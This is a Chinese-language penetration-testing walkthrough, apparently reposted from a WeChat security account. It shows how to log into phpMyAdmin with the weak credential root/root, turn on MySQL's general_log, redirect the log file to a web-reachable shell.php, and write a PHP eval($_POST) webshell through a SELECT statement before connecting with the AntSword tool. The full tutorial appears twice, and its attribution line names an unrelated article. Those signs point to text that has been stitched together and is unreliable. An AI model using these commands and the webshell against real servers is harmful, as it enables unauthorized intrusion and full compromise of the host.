扫描获取phpmyadmin并通过弱口令进入后台!
弱密码root root
查看mysql的日志状态
查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销
show global variables like '%secure%';
general_log为是否支持写入
general_log_file为日志保存的位置
打开日志读写setglobal general_log =on;
修改邮箱日志路径
修改一下路径set global general_log_file='C:myphp_wwwPHPTutorialMySQLdatashell.php';
写入马
将马写入日志中!!!
通过select查询操作写入日志
查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>
成功写入
再通过phpinfo查找一下绝对路径
最后成功连接
总结步骤:
1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态
2、set global general_log = on; 开启general_log模式
3、set global general_log_file='日志路径shell.php'; 修改日志目录为shell地址
(set global general_log_file='C:myphp_wwwPHPTutorialWWWpublicshell.php';)
4、select ' <?php eval($_POST[cc]);? '
写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
5.日志路径通过扫描端口phpinfo.php获得
6.连接蚁剑!
扫描获取phpmyadmin并通过弱口令进入后台!
弱密码root root
查看mysql的日志状态
查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销
show global variables like '%secure%';
general_log为是否支持写入
general_log_file为日志保存的位置
打开日志读写setglobal general_log =on;
修改邮箱日志路径
修改一下路径set global general_log_file='C:myphp_wwwPHPTutorialMySQLdatashell.php';
写入马
将马写入日志中!!!
通过select查询操作写入日志
查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>
成功写入
再通过phpinfo查找一下绝对路径
最后成功连接
总结步骤:
1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态
2、set global general_log = on; 开启general_log模式
3、set global general_log_file='日志路径shell.php'; 修改日志目录为shell地址
(set global general_log_file='C:myphp_wwwPHPTutorialWWWpublicshell.php';)
4、select ' <?php eval($_POST[cc]);? '
写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
5.日志路径通过扫描端口phpinfo.php获得
6.连接蚁剑!
本公众号云息信安所提供的信息以及工具仅供安全测试人员用于授权测试,禁止用于未授权测试,请勿非法使用!!!造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号云息信安及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
原文始发于微信公众号(云息信安):edusrc某证书站挖掘分享(越权)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论